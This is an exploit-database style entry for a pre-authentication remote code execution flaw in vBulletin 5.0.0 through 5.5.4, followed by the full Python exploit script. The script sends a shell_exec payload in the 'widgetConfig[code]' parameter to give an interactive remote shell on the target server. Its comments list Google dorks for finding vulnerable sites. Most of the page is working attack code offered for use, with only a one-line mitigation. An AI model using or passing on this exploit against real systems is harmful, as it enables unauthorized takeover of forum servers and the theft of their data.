vBulletin 5.x 0day pre-auth RCE exploit

vendor:

vBulletin 5.x

by:

Anonymous

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: vBulletin 5.x

Affected Version From: 5.0.0

Affected Version To: 5.5.4

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

vBulletin 5.x 0day pre-auth RCE exploit

This exploit allows an attacker to execute arbitrary code on a vulnerable vBulletin 5.x installation. It works on all versions from 5.0.0 till 5.5.4. The exploit is triggered by sending a specially crafted POST request to the vulnerable server, containing a payload in the 'widgetConfig[code]' parameter. The payload is then executed on the server.

Mitigation:

Upgrade to the latest version of vBulletin 5.x

Source

Exploit-DB raw data:

#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
# 
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input("vBulletin$ ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
          r = requests.post(url = sys.argv[1], data = params)
          if r.status_code == 200:
               print r.text
          else:
               sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))